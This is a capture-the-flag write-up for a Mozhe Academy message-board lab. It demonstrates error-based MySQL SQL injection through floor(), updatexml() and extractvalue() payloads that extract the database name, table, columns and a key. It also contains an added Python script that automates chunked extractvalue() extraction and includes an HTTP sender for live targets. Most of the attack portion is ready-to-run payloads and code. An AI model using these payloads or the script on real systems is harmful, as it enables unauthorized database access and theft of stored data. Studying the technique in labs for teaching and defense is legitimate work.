Background
Recently someone left an anonymous message for an engineer thanking him for his hard work in building 墨者学院 (Mozhe Academy) so well. Unexpectedly, this prompted the engineer to poke at the message board, and he easily found out who the person was.
Training objectives
1. Master how a message board works;
2. Make good use of Burp to capture the request packets;
Approach
Capture the request and analyze it.
1. Determine the injection type
Appending a single quote after ?Id=62 throws a database error, so the initial judgement is that this is an error-based injection. There are roughly ten error-based techniques; three are used here: floor(), updatexml() and extractvalue(). Others such as exp() and multipoint() did not seem to work here (both only work on specific MySQL versions).
2. Get the current database name
and (select 1 from(select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)
==============================================================================
and (updatexml(1,concat(0x7e,(select database()),0x7e),1))
==============================================================================
and (extractvalue(1, concat(0x5c,(select database()))))
==============================================================================
This reveals the database name, pikaqiu:
XPATH syntax error: '\pikaqiu'
3. Get the tables in the database
and (select 1 from(select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema='pikaqiu'),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)
==============================================================================
and (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikaqiu'),0x7e),1))
==============================================================================
and (extractvalue(1, concat(0x5c,(select table_name from information_schema.tables where table_schema='pikaqiu'))))
XPATH syntax error: '\message'
This gives the table message. (The subquery returned a single row here; with more than one table it would fail with "Subquery returns more than 1 row", so either page through the rows with limit N,1 as in the next step or use group_concat(table_name).)
4. Get the columns of the table
and (select 1 from(select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='message' limit 3,1),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)
==============================================================================
and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='message' limit 3,1),0x7e),1))
==============================================================================
and (extractvalue(1, concat(0x5c,(select column_name from information_schema.columns where table_name='message' limit 3,1))))
Adjusting the first number in limit reveals the columns: id, content, key, time. (Filtering on table_schema='pikaqiu' as well would avoid matching a same-named table in another schema.)
XPATH syntax error: '\key'
5. Get the key value
and (select 1 from(select count(*),concat(0x3a,0x3a,(SELECT concat_ws(':', `key`) FROM message limit 0,1),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)
(The payload as originally run had an extra ")" after "limit 0,1", which unbalanced the parentheses and is why this variant failed; it is corrected above.)
==============================================================================
and (updatexml(1,concat(0x7e,(SELECT concat_ws(':', `key`) FROM message limit 0,1),0x7e),1))
==============================================================================
and extractvalue(1,concat(0x5c,(SELECT concat_ws(':', `key`) FROM message limit 0,1)))
==============================================================================
This gives the key value:
XPATH syntax error: '\mozheb18e10d2fbffaffbb315bf22d2'
Note: updatexml()/extractvalue() show at most 32 characters of the injected string, and this output is exactly 32 (the backslash plus 31 characters), so the key may be cut off. Check by wrapping the subquery in substr() with an offset of 32 and reading the remainder in the same way.
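The three payload variants above all leak one value per request, and the XPath-based ones cap the leaked string at 32 characters. The script below is an added example, not part of the original writeup or of Mozhe's own material: it automates the extractvalue() variant, slicing the target value with substr() in 31-character windows and stitching the pieces together. It is driven through a send() callable so the same logic can run against a live target or against a constructed stand-in; the stand-in, the made-up 37-character key, and the assumption that the injection point is a GET parameter named Id (the page shows ?Id=62) are all assumptions of this example.

```python
import re
import urllib.parse
import urllib.request
from typing import Callable, Optional

# updatexml()/extractvalue() echo at most 32 characters of the bad XPath
# string in the error message, and one of those is the 0x5c marker, so a
# single request leaks at most 31 characters of the injected value.
WINDOW = 31

# MySQL prints ASCII quotes; the curly quotes seen on the page are a
# rendering artifact, so both forms are accepted here.
ERR_RE = re.compile(r"XPATH syntax error: ['‘]\\(.*?)['’]")


def build_payload(inner_query: str, offset: int) -> str:
    """Return the extractvalue() suffix that leaks one WINDOW-sized slice of
    inner_query's single-row result. offset is 1-based, as in MySQL substr()."""
    return (" and extractvalue(1, concat(0x5c, substr(("
            f"{inner_query}), {offset}, {WINDOW})))")


def parse_leak(body: str) -> Optional[str]:
    """Pull the leaked slice out of a response body; None if no XPath error."""
    m = ERR_RE.search(body)
    return m.group(1) if m else None


def extract_value(send: Callable[[str], str], inner_query: str) -> str:
    """Recover the full value of inner_query by walking it in 31-char windows.
    send() takes the payload suffix and returns the response body."""
    value, offset = "", 1
    while True:
        chunk = parse_leak(send(build_payload(inner_query, offset)))
        if chunk is None:
            raise RuntimeError("no XPath error in response; check the injection point")
        value += chunk
        # A short (or empty) slice means we ran past the end of the value.
        if len(chunk) < WINDOW:
            return value
        offset += WINDOW


def http_send(base_url: str, param: str = "Id", value: str = "62") -> Callable[[str], str]:
    """Build a send() for a live target. The page injects after ?Id=62; that it
    is a plain GET parameter is an assumption of this example."""
    def send(payload: str) -> str:
        url = f"{base_url}?{param}={urllib.parse.quote(value + payload, safe='')}"
        with urllib.request.urlopen(url) as resp:
            return resp.read().decode("utf-8", errors="replace")
    return send


# ---- Constructed stand-in for the vulnerable page (no MySQL involved) ----
# It only emulates how MySQL reports the injected string: a backslash plus
# the substr() slice, cut to 32 characters. The key value is made up and is
# deliberately longer than one window so the stitching is exercised.
FAKE_ROWS = {
    "select database()": "pikaqiu",
    "select `key` from message limit 0,1": "mozhe" + "0123456789abcdef" * 2,  # 37 chars
}
SUBSTR_RE = re.compile(r"substr\(\((.*?)\), (\d+), (\d+)\)")


def fake_server(payload: str) -> str:
    m = SUBSTR_RE.search(payload)
    if m is None:
        return "<html>normal page</html>"
    row = FAKE_ROWS.get(m.group(1), "")
    start, length = int(m.group(2)) - 1, int(m.group(3))
    leaked = ("\\" + row[start:start + length])[:32]
    return f"XPATH syntax error: '{leaked}'"


if __name__ == "__main__":
    print(extract_value(fake_server, "select database()"))
    print(extract_value(fake_server, "select `key` from message limit 0,1"))
```

Against a real target, replace fake_server with http_send("http://host/path") and pass the same inner queries; the loop stops on its own when a window comes back shorter than 31 characters, which also covers values that are an exact multiple of 31 (the final window is empty).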
6. Summary
Summary: when fetching the key, the floor() variant fails because the payload as written has an extra ")" after "limit 0,1", which unbalances the query. The other two variants need ':' inside concat_ws() because concat_ws() takes the separator as its first argument and rejects a single-argument call, so without it the column would be treated as the separator; the wrapper is not needed at all, since SELECT `key` FROM message limit 0,1 returns the same value on its own (the backticks are required because key is a reserved word in MySQL).
Also: sqlmap does not manage to dump the key value.